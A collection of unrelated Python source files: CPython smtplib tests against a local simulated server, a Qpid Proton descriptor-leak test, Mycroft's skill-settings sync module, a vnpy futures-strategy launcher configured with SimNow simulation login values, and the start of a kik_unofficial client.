smtp.connect(HOST, self.port)
self.assertNotIn('size', smtp.esmtp_features)
smtp.ehlo_or_helo_if_needed()
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
def test_with_statement(self):
with smtplib.SMTP(HOST, self.port) as smtp:
code, message = smtp.noop()
self.assertEqual(code, 250)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.close()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
def test_with_statement_QUIT_failure(self):
with self.assertRaises(smtplib.SMTPResponseException) as error:
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.noop()
self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
self.assertEqual(error.exception.smtp_code, 421)
self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
# Issue 17498: make sure _rset does not raise SMTPServerDisconnected exception
def test__rest_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '451 Requested action aborted'
self.serv._SMTPchannel.disconnect = True
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
# Issue 5713: make sure close, not rset, is called if we get a 421 error
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('John@foo.org', ['Sally@foo.org'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
def test_smtputf8_NotSupportedError_if_no_server_support(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertFalse(smtp.has_extn('smtputf8'))
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.sendmail,
'John', 'Sally', '', mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.mail, 'John', options=['BODY=8BITMIME', 'SMTPUTF8'])
def test_send_unicode_without_SMTPUTF8(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
self.assertRaises(UnicodeEncodeError, smtp.sendmail, 'Alice', 'Böb', '')
self.assertRaises(UnicodeEncodeError, smtp.mail, 'Älice')
def test_send_message_error_on_non_ascii_addrs_if_no_smtputf8(self):
# This test is located here and not in the SMTPUTF8SimTests
# class because it needs a "regular" SMTP server to work
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
with self.assertRaises(smtplib.SMTPNotSupportedError):
smtp.send_message(msg)
def test_name_field_not_included_in_envelop_addresses(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3
)
self.addCleanup(smtp.close)
message = EmailMessage()
message['From'] = email.utils.formataddr(('Michaël', 'michael@example.com'))
message['To'] = email.utils.formataddr(('René', 'rene@example.com'))
self.assertDictEqual(smtp.send_message(message), {})
self.assertEqual(self.serv._addresses['from'], 'michael@example.com')
self.assertEqual(self.serv._addresses['tos'], ['rene@example.com'])
class SimSMTPUTF8Server(SimSMTPServer):
def __init__(self, *args, **kw):
# The base SMTP server turns these on automatically, but our test
# server is set up to munge the EHLO response, so we need to provide
# them as well. And yes, the call is to SMTPServer not SimSMTPServer.
self._extra_features = ['SMTPUTF8', '8BITMIME']
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data,
enable_SMTPUTF8=self.enable_SMTPUTF8,
)
def process_message(self, peer, mailfrom, rcpttos, data, mail_options=None,
rcpt_options=None):
self.last_peer = peer
self.last_mailfrom = mailfrom
self.last_rcpttos = rcpttos
self.last_message = data
self.last_mail_options = mail_options
self.last_rcpt_options = rcpt_options
class SMTPUTF8SimTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPUTF8Server((HOST, 0), ('nowhere', -1),
decode_data=False,
enable_SMTPUTF8=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def test_test_server_supports_extensions(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertTrue(smtp.has_extn('smtputf8'))
def test_send_unicode_with_SMTPUTF8_via_sendmail(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('Jőhn', 'Sálly', m,
mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertEqual(self.serv.last_mailfrom, 'Jőhn')
self.assertEqual(self.serv.last_rcpttos, ['Sálly'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_unicode_with_SMTPUTF8_via_low_level_API(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertEqual(
smtp.mail('Jő', options=['BODY=8BITMIME', 'SMTPUTF8']),
(250, b'OK'))
self.assertEqual(smtp.rcpt('János'), (250, b'OK'))
self.assertEqual(smtp.data(m), (250, b'OK'))
self.assertEqual(self.serv.last_mailfrom, 'Jő')
self.assertEqual(self.serv.last_rcpttos, ['János'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_message_uses_smtputf8_if_addrs_non_ascii(self):
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
# XXX I don't know why I need two \n's here, but this is an existing
# bug (if it is one) and not a problem with the new functionality.
msg.set_content("oh là là, know what I mean, know what I mean?\n\n")
# XXX smtpd converts received /r/n to /n, so we can't easily test that
# we are successfully sending /r/n :(.
expected = textwrap.dedent("""\
From: Páolo <főo@bar.com>
To: Dinsdale
Subject: Nudge nudge, wink, wink \u1F609
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
oh là là, know what I mean, know what I mean?
""")
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
self.assertEqual(smtp.send_message(msg), {})
self.assertEqual(self.serv.last_mailfrom, 'főo@bar.com')
self.assertEqual(self.serv.last_rcpttos, ['Dinsdale'])
self.assertEqual(self.serv.last_message.decode(), expected)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
EXPECTED_RESPONSE = encode_base64(b'\0psu\0doesnotexist', eol='')
class SimSMTPAUTHInitialResponseChannel(SimSMTPChannel):
def smtp_AUTH(self, arg):
# RFC 4954's AUTH command allows for an optional initial-response.
# Not all AUTH methods support this; some require a challenge. AUTH
# PLAIN does those, so test that here. See issue #15014.
args = arg.split()
if args[0].lower() == 'plain':
if len(args) == 2:
# AUTH PLAIN <initial-response> with the response base 64
# encoded. Hard code the expected response for the test.
if args[1] == EXPECTED_RESPONSE:
self.push('235 Ok')
return
self.push('571 Bad authentication')
class SimSMTPAUTHInitialResponseServer(SimSMTPServer):
channel_class = SimSMTPAUTHInitialResponseChannel
class SMTPAUTHInitialResponseSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPAUTHInitialResponseServer(
(HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testAUTH_PLAIN_initial_response_login(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost', timeout=15)
smtp.login('psu', 'doesnotexist')
smtp.close()
def testAUTH_PLAIN_initial_response_auth(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost', timeout=15)
smtp.user = 'psu'
smtp.password = 'doesnotexist'
code, response = smtp.auth('plain', smtp.auth_plain)
smtp.close()
self.assertEqual(code, 235)
if __name__ == '__main__':
unittest.main()
|
test_PROTON_1800_syncrequestresponse_fd_leak.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
"""
PROTON-1800 BlockingConnection descriptor leak
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import socket
import uuid
import gc
import os
import threading
import subprocess
from collections import namedtuple
import cproton
import proton
import proton.reactor
from proton import Message
from proton.utils import SyncRequestResponse, BlockingConnection
from proton.handlers import IncomingMessageHandler
from test_unittest import unittest
def count_fds():
# type: () -> int
return len(os.listdir('/proc/self/fd/'))
@contextlib.contextmanager
def no_fd_leaks(test):
# type: (unittest.TestCase) -> None
before = count_fds()
yield
delta = count_fds() - before
if delta != 0:
subprocess.check_call("ls -lF /proc/{0}/fd/".format(os.getpid()), shell=True)
test.assertEqual(0, delta, "Found {0} new fd(s) after the test".format(delta))
class Broker(proton.handlers.MessagingHandler):
def __init__(self, acceptor_url):
# type: (str) -> None
super(Broker, self).__init__()
self.acceptor_url = acceptor_url
self.sender = None
self.acceptor = None
self._acceptor_opened_event = threading.Event()
def get_acceptor_sockname(self):
# type: () -> (str, int)
self._acceptor_opened_event.wait()
if hasattr(self.acceptor, '_selectable'): # proton 0.30.0+
sockname = self.acceptor._selectable._delegate.getsockname()
else: # works in proton 0.27.0
selectable = cproton.pn_cast_pn_selectable(self.acceptor._impl)
fd = cproton.pn_selectable_get_fd(selectable)
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
sockname = s.getsockname()
return sockname[:2]
def on_start(self, event):
self.acceptor = event.container.listen(self.acceptor_url)
self._acceptor_opened_event.set()
def on_link_opening(self, event):
if event.link.is_sender:
assert event.link.remote_source.dynamic
address = str(uuid.uuid4())
event.link.source.address = address
self.sender = event.link
elif event.link.remote_target.address:
event.link.target.address = event.link.remote_target.address
def on_message(self, event):
message = event.message
assert self.sender.source.address == message.reply_to
reply = proton.Message(body=message.body.upper(), correlation_id=message.correlation_id)
self.sender.send(reply)
@contextlib.contextmanager
def test_broker():
broker = Broker('localhost:0')
container = proton.reactor.Container(broker)
threading.Thread(target=container.run).start()
yield broker
container.stop()
PROC_SELF_FD_EXISTS = os.path.exists("/proc/self/fd"), "Skipped: Directory /proc/self/fd does not exist"
class Proton1800Test(unittest.TestCase):
@unittest.skipUnless(*PROC_SELF_FD_EXISTS)
def test_sync_request_response_blocking_connection_no_object_leaks(self):
with test_broker() as tb:
sockname = tb.get_acceptor_sockname()
url = "{0}:{1}".format(*sockname)
opts = namedtuple('Opts', ['address', 'timeout'])(address=url, timeout=3)
with no_fd_leaks(self):
client = SyncRequestResponse(
BlockingConnection(url, opts.timeout, allowed_mechs="ANONYMOUS"), "somequeue")
try:
request = "One Two Three Four"
response = client.call(Message(body=request))
finally:
client.connection.close()
gc.collect()
|
settings.py
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
SkillSettings is a simple extension of a Python dict which enables
simplified storage of settings. Values stored into the dict will
automatically persist locally. Additionally, it can interact with
a backend system to provide a GUI interface for some or all of the
settings.
The GUI for the setting is described by a file in the skill's root
directory called settingsmeta.json (or settingsmeta.yaml, if you
prefer working with yaml). The "name" associates the user-interface
field with the setting name in the dictionary. For example, you
might have a setting['username']. In the settingsmeta you can
describe the interface you want to edit that value with:
...
"fields": [
{
"name": "username",
"type": "email",
"label": "Email address to associate",
"placeholder": "example@mail.com",
"value": ""
}]
...
When the user changes the setting via the web UI, it will be sent
down to all the devices and automatically placed into the
settings['username']. Any local changes made to the value (e.g.
via a verbal interaction) will also be synched to the server to show
on the web interface.
NOTE: As it stands today, this functions seamlessly with a single
device. With multiple devices there are a few hitches that are being
worked out. The first device where a skill is installed creates the
setting and values are sent down to any other devices that install the
same skill. However only the original device can make changes locally
for synching to the web. This limitation is temporary and will be
removed soon.
Usage Example:
from mycroft.skill.settings import SkillSettings
s = SkillSettings('./settings.json', 'ImportantSettings')
s['meaning of life'] = 42
s['flower pot sayings'] = 'Not again...'
s.store() # This happens automagically in a MycroftSkill
"""
import json
import hashlib
import os
import time
import copy
import re
from threading import Timer, Thread
from os.path import isfile, join, expanduser
from requests.exceptions import RequestException, HTTPError
from msm import SkillEntry
from mycroft.api import DeviceApi, is_paired
from mycroft.util.log import LOG
from mycroft.util import camel_case_split
from mycroft.configuration import ConfigurationManager
from .msm_wrapper import create_msm
msm = None
msm_creation_time = 0
def build_global_id(directory, config):
""" Create global id for the skill.
TODO: Handle dirty skill
Arguments:
directory: skill directory
config: config for the device to fetch msm setup
"""
# Update the msm object if it's more than an hour old
global msm
global msm_creation_time
if msm is None or time.time() - msm_creation_time > 60 * 60:
msm_creation_time = time.time()
msm = create_msm(config)
s = SkillEntry.from_folder(directory, msm)
# If modified prepend the device uuid
return s.skill_gid, s.meta_info.get('display_name')
def display_name(name):
""" Splits camelcase and removes leading/trailing Skill. """
name = re.sub(r'(^[Ss]kill|[Ss]kill$)', '', name)
return camel_case_split(name)
class DelayRequest(Exception):
""" Indicate that the next request should be delayed. """
pass
class SkillSettings(dict):
""" Dictionary that can easily be saved to a file, serialized as json. It
also syncs to the backend for skill settings
Args:
directory (str): Path to storage directory
name (str): user readable name associated with the settings
no_upload (bool): True if the upload to mycroft servers should be
disabled.
"""
def __init__(self, directory, name):
super(SkillSettings, self).__init__()
# when skills try to instantiate settings
# in __init__, it can erase the settings saved
# on disk (settings.json). So this prevents that
# This is set to true in core.py after skill init
self.allow_overwrite = False
self.api = DeviceApi()
self.config = ConfigurationManager.get()
self.name = name
# set file paths
self._settings_path = join(directory, 'settings.json')
self._meta_path = _get_meta_path(directory)
self._directory = directory
self.is_alive = True
self.loaded_hash = hash(json.dumps(self, sort_keys=True))
self._complete_intialization = False
self._device_identity = None
self._api_path = None
self._user_identity = None
self.changed_callback = None
self._poll_timer = None
self._blank_poll_timer = None
self._is_alive = True
# Add Information extracted from the skills-meta.json entry for the
# skill.
skill_gid, disp_name = build_global_id(self._directory, self.config)
self.__skill_gid = skill_gid
self.display_name = disp_name
# if settingsmeta exist
if self._meta_path:
t = Thread(target=self._poll_skill_settings)
t.daemon = True
t.start()
# if not disallowed by user upload an entry for all skills installed
elif self.config['skills']['upload_skill_manifest']:
self._blank_poll_timer = Timer(1, self._init_blank_meta)
self._blank_poll_timer.daemon = True
self._blank_poll_timer.start()
@property
def skill_gid(self):
""" Finalizes the skill gid to include device uuid if needed. """
if is_paired():
return self.__skill_gid.replace('@|', '@{}|'.format(
DeviceApi().identity.uuid))
else:
return self.__skill_gid
def __hash__(self):
""" Simple object unique hash. """
return hash(str(id(self)) + self.name)
def run_poll(self, _=None):
"""Immediately poll the web for new skill settings"""
if self._poll_timer:
self._poll_timer.cancel()
self._poll_skill_settings()
def stop_polling(self):
self._is_alive = False
if self._poll_timer:
self._poll_timer.cancel()
if self._blank_poll_timer:
self._blank_poll_timer.cancel()
def set_changed_callback(self, callback):
""" Set callback to perform when server settings have changed.
Args:
callback: function/method to call when settings have changed
"""
self.changed_callback = callback
# TODO: break this up into two classes
def initialize_remote_settings(self):
""" initializes the remote settings to the server """
# if the settingsmeta file exists (and is valid)
# this block of code is a control flow for
# different scenarios that may arises with settingsmeta
self.load_skill_settings_from_file() # loads existing settings.json
settings_meta = self._load_settings_meta()
if not settings_meta:
return
if not is_paired():
return
self._device_identity = self.api.identity.uuid
self._api_path = "/" + self._device_identity + "/skill"
try:
self._user_identity = self.api.get()['user']['uuid']
except RequestException:
return
settings = self._request_my_settings(self.skill_gid)
if settings:
self.save_skill_settings(settings)
# TODO if this skill_gid is not a modified version check if a modified
# version exists on the server and delete it
# Always try to upload settingsmeta on startup
self._upload_meta(settings_meta, self.skill_gid)
self._complete_intialization = True
@property
def _is_stored(self):
return hash(json.dumps(self, sort_keys=True)) == self.loaded_hash
def __getitem__(self, key):
""" Get key """
return super(SkillSettings, self).__getitem__(key)
def __setitem__(self, key, value):
""" Add/Update key. """
if self.allow_overwrite or key not in self:
return super(SkillSettings, self).__setitem__(key, value)
def _load_settings_meta(self):
""" Load settings metadata from the skill folder.
If no settingsmeta exists a basic settingsmeta will be created
containing a basic identifier.
Returns:
(dict) settings meta
"""
# Imported here do handle issue with readthedocs build
import yaml
if self._meta_path and os.path.isfile(self._meta_path):
_, ext = os.path.splitext(self._meta_path)
json_file = True if ext.lower() == ".json" else False
try:
with open(self._meta_path, encoding='utf-8') as f:
if json_file:
data = json.load(f)
else:
data = yaml.safe_load(f)
except Exception as e:
LOG.error("Failed to load setting file: " + self._meta_path)
LOG.error(repr(e))
data = {}
else:
data = {}
# Insert skill_gid and display_name
data['skill_gid'] = self.skill_gid
data['display_name'] = (self.display_name or data.get('name') or
display_name(self.name))
# Backwards compatibility:
if 'name' not in data:
data['name'] = data['display_name']
return data
def _send_settings_meta(self, settings_meta):
""" Send settingsmeta to the server.
Args:
settings_meta (dict): dictionary of the current settings meta
Returns:
dict: uuid, a unique id for the setting meta data
"""
try:
uuid = self.api.upload_skill_metadata(
self._type_cast(settings_meta, to_platform='web'))
return uuid
except HTTPError as e:
if e.response.status_code in [422, 500, 501]:
LOG.info(e.response.status_code)
raise DelayRequest
else:
LOG.error(e)
return None
except Exception as e:
LOG.error(e)
return None
def save_skill_settings(self, skill_settings):
""" Takes skill object and save onto self
Args:
skill_settings (dict): skill
"""
if 'skillMetadata' in skill_settings:
sections = skill_settings['skillMetadata']['sections']
for section in sections:
for field in section["fields"]:
if "name" in field and "value" in field:
# Bypass the change lock to allow server to update
# during skill init
super(SkillSettings, self).__setitem__(field['name'],
field['value'])
self.store()
def _migrate_settings(self, settings_meta):
""" sync settings.json and settingsmeta in memory """
meta = settings_meta.copy()
if 'skillMetadata' not in meta:
return meta
self.load_skill_settings_from_file()
sections = meta['skillMetadata']['sections']
for i, section in enumerate(sections):
for j, field in enumerate(section['fields']):
if 'name' in field:
if field["name"] in self:
sections[i]['fields'][j]['value'] = \
str(self.__getitem__(field['name']))
meta['skillMetadata']['sections'] = sections
return meta
def _upload_meta(self, settings_meta, identifier):
""" uploads the new meta data to settings with settings migration
Args:
settings_meta (dict): settingsmeta.json or settingsmeta.yaml
identifier (str): identifier for skills meta data
"""
LOG.debug('Uploading settings meta for {}'.format(identifier))
meta = self._migrate_settings(settings_meta)
meta['identifier'] = identifier
response = self._send_settings_meta(meta)
def hash(self, string):
""" md5 hasher for consistency across cpu architectures """
return hashlib.md5(bytes(string, 'utf-8')).hexdigest()
def update_remote(self):
""" update settings state from server """
settings_meta = self._load_settings_meta()
if settings_meta is None:
return
# Get settings
skills_settings = self._request_my_settings(self.skill_gid)
if skills_settings is not None:
self.save_skill_settings(skills_settings)
else:
LOG.debug("No Settings on server for {}".format(self.skill_gid))
# Settings meta doesn't exist on server push them
settings_meta = self._load_settings_meta()
self._upload_meta(settings_meta, self.skill_gid)
def _init_blank_meta(self):
""" Send blank settingsmeta to remote. """
try:
if not is_paired() and self.is_alive:
self._blank_poll_timer = Timer(60, self._init_blank_meta)
self._blank_poll_timer.daemon = True
self._blank_poll_timer.start()
else:
self.initialize_remote_settings()
except DelayRequest:
# Delay 5 minutes and retry
self._blank_poll_timer = Timer(60 * 5,
self._init_blank_meta)
self._blank_poll_timer.daemon = True
self._blank_poll_timer.start()
except Exception as e:
LOG.exception('Failed to send blank meta: {}'.format(repr(e)))
def _poll_skill_settings(self):
""" If identifier exists for this skill poll to backend to
request settings and store it if it changes
TODO: implement as websocket
"""
delay = 1
original = hash(str(self))
try:
if not is_paired():
pass
elif not self._complete_intialization:
self.initialize_remote_settings()
else:
self.update_remote()
except DelayRequest:
LOG.info('{}: Delaying next settings fetch'.format(self.name))
delay = 5
except Exception as e:
LOG.exception('Failed to fetch skill settings: {}'.format(repr(e)))
finally:
# Call callback for updated settings
if self._complete_intialization:
if self.changed_callback and hash(str(self)) != original:
self.changed_callback()
if self._poll_timer:
self._poll_timer.cancel()
if not self._is_alive:
return
# continues to poll settings every minute
self._poll_timer = Timer(delay * 60, self._poll_skill_settings)
self._poll_timer.daemon = True
self._poll_timer.start()
def load_skill_settings_from_file(self):
""" If settings.json exist, open and read stored values into self """
if isfile(self._settings_path):
with open(self._settings_path) as f:
try:
json_data = json.load(f)
for key in json_data:
self[key] = json_data[key]
except Exception as e:
# TODO: Show error on webUI. Dev will have to fix
# metadata to be able to edit later.
LOG.error(e)
def _type_cast(self, settings_meta, to_platform):
""" Tranform data type to be compatible with Home and/or Core.
e.g.
Web to core
"true" => True, "1.4" => 1.4
core to Web
False => "false'
Args:
settings_meta (dict): skills object
to_platform (str): platform to convert
compatible data types to
Returns:
dict: skills object
"""
meta = settings_meta.copy()
if 'skillMetadata' not in settings_meta:
return meta
sections = meta['skillMetadata']['sections']
for i, section in enumerate(sections):
for j, field in enumerate(section.get('fields', [])):
_type = field.get('type')
if _type == 'checkbox':
value = field.get('value')
if to_platform == 'web':
if value is True or value == 'True':
sections[i]['fields'][j]['value'] = 'true'
elif value is False or value == 'False':
sections[i]['fields'][j]['value'] = 'false'
elif to_platform == 'core':
if value == 'true' or value == 'True':
sections[i]['fields'][j]['value'] = True
elif value == 'false' or value == 'False':
sections[i]['fields'][j]['value'] = False
elif _type == 'number':
value = field.get('value')
if to_platform == 'core':
if "." in value:
sections[i]['fields'][j]['value'] = float(value)
else:
sections[i]['fields'][j]['value'] = int(value)
elif to_platform == 'web':
sections[i]['fields'][j]['value'] = str(value)
meta['skillMetadata']['sections'] = sections
return meta
def _request_my_settings(self, identifier):
""" Get skill settings for this device associated
with the identifier
Args:
identifier (str): a hashed_meta
Returns:
skill_settings (dict or None): returns a dict if matches
"""
settings = self._request_settings()
if settings:
# this loads the settings into memory for use in self.store
for skill_settings in settings:
if skill_settings['identifier'] == identifier:
LOG.debug("Fetched settings for {}".format(identifier))
skill_settings = \
self._type_cast(skill_settings, to_platform='core')
self._remote_settings = skill_settings
return skill_settings
return None
def _request_settings(self):
""" Get all skill settings for this device from server.
Returns:
dict: dictionary with settings collected from the server.
"""
try:
settings = self.api.get_skill_settings()
except RequestException:
return None
settings = [skills for skills in settings if skills is not None]
return settings
@property
def _should_upload_from_change(self):
changed = False
if (hasattr(self, '_remote_settings') and
'skillMetadata' in self._remote_settings):
sections = self._remote_settings['skillMetadata']['sections']
for i, section in enumerate(sections):
for j, field in enumerate(section['fields']):
if 'name' in field:
# Ensure that the field exists in settings and that
# it has a value to compare
if (field["name"] in self and
'value' in sections[i]['fields'][j]):
remote_val = sections[i]['fields'][j]["value"]
self_val = self.get(field['name'])
if str(remote_val) != str(self_val):
changed = True
if self.get('not_owner'):
changed = False
return changed
def store(self, force=False):
""" Store dictionary to file if a change has occured.
Args:
force: Force write despite no change
"""
if force or not self._is_stored:
with open(self._settings_path, 'w') as f:
json.dump(self, f)
self.loaded_hash = hash(json.dumps(self, sort_keys=True))
if self._should_upload_from_change:
settings_meta = self._load_settings_meta()
self._upload_meta(settings_meta, self.skill_gid)
def _get_meta_path(base_directory):
json_path = join(base_directory, 'settingsmeta.json')
yaml_path = join(base_directory, 'settingsmeta.yaml')
if isfile(json_path):
return json_path
if isfile(yaml_path):
return yaml_path
return None
|
noui.py
|
import multiprocessing
from time import sleep
from datetime import datetime, time
from logging import INFO
from vnpy.app.data_recorder import DataRecorderApp
from vnpy.event import EventEngine
from vnpy.trader.setting import SETTINGS
from vnpy.trader.engine import MainEngine
from vnpy.gateway.ctp import CtpGateway
from vnpy.app.cta_strategy import CtaStrategyApp
from vnpy.app.cta_strategy.base import EVENT_CTA_LOG
SETTINGS["log.active"] = True
SETTINGS["log.level"] = INFO
SETTINGS["log.console"] = True
ctp_setting = {
"用户名": "107462",
"密码": "110120",
"经纪商代码": "9999",
"交易服务器": "tcp://180.168.146.187:10101",
"行情服务器": "tcp://180.168.146.187:10111",
"产品名称": "simnow_client_test",
"授权编码": "0000000000000000",
"产品信息": ""
}
def run_child():
"""
Running in the child process.
"""
SETTINGS["log.file"] = True
event_engine = EventEngine()
main_engine = MainEngine(event_engine)
main_engine.add_gateway(CtpGateway)
cta_engine = main_engine.add_app(CtaStrategyApp)
main_engine.write_log("主引擎创建成功")
main_engine.add_app(DataRecorderApp)
log_engine = main_engine.get_engine("log")
event_engine.register(EVENT_CTA_LOG, log_engine.process_log_event)
main_engine.write_log("注册日志事件监听")
main_engine.connect(ctp_setting, "CTP")
main_engine.write_log("连接CTP接口")
#sleep(10)
cta_engine.init_engine()
main_engine.write_log("CTA策略初始化完成")
cta_engine.init_all_strategies()
#sleep(60) # Leave enough time to complete strategy initialization
main_engine.write_log("CTA策略全部初始化")
cta_engine.start_all_strategies()
main_engine.write_log("CTA策略全部启动")
while True:
sleep(1)
def run_parent():
"""
Running in the parent process.
"""
print("启动CTA策略守护父进程")
# Chinese futures market trading period (day/night)
DAY_START = time(8, 45)
DAY_END = time(15, 30)
NIGHT_START = time(20, 45)
NIGHT_END = time(2, 45)
child_process = None
while True:
current_time = datetime.now().time()
trading = False
# Check whether in trading period
if (
(current_time >= DAY_START and current_time <= DAY_END)
or (current_time >= NIGHT_START)
or (current_time <= NIGHT_END)
):
trading = True
# Start child process in trading period
if trading and child_process is None:
print("启动子进程")
child_process = multiprocessing.Process(target=run_child)
child_process.start()
print("子进程启动成功")
# 非记录时间则退出子进程
if not trading and child_process is not None:
print("关闭子进程")
child_process.terminate()
child_process.join()
child_process = None
print("子进程关闭成功")
sleep(5)
if __name__ == "__main__":
run_parent()
|
client.py
|
import asyncio
import logging
import sys
import time
from threading import Thread, Event
from typing import Union, List, Tuple
from asyncio import Transport, Protocol
from bs4 import BeautifulSoup
import kik_unofficial.callbacks as callbacks
